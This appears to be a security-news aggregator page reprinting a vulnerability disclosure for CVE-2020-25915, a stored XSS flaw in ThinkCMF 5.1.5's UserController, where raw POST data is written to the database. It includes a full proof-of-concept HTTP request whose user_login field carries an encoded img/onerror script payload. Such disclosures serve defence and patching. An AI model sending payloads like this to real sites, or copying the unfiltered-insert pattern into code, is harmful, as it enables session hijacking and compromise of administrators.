Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2020-25915: There is a store Stored XSS vulnerability in user management · Issue #675 · thinkcmf/thinkcmf

Cross Site Scripting (XSS) vulnerability in UserController.php in ThinkCMF version 5.1.5, allows attackers to execute arbitrary code via crafted user_login.

CVE
Open in Source
#xss#vulnerability#web#windows#apple#js#java#php#chrome#webkit

At vendor/thinkcmf/cmf-app/src/admin/controller/UserController.php

There is no filtering of the user’s post requests.

For example:

line 138:

$result = DB::name(‘user’)->insertGetId($_POST);

line 221:
$result = DB::name(‘user’)->update($_POST);

So There is a Stored XSS vulnerability in user management,

POC:

POST /admin/user/addpost.html HTTP/1.1
Host: test.net
Connection: close
Content-Length: 115
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://test.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://test.net/admin/user/add.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: thinkphp_show_page_trace=0|0; admin_username=admin; PHPSESSID=ju91k4c4do16sl2qqac553edl1

user_login=%3Cimg+src%3D''+onerror%3Dalert(%2Fxss%2F)%3E&user_pass=123456&user_email=1111%40qqq.com&role_id%5B%5D=2

Related news

GHSA-4847-gqxx-v9xp: ThinkCMF Cross-site Scripting Vulnerability

Cross Site Scripting (XSS) vulnerability in `UserController.php` in ThinkCMF version 5.1.5, allows attackers to execute arbitrary code via crafted `user_login`.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE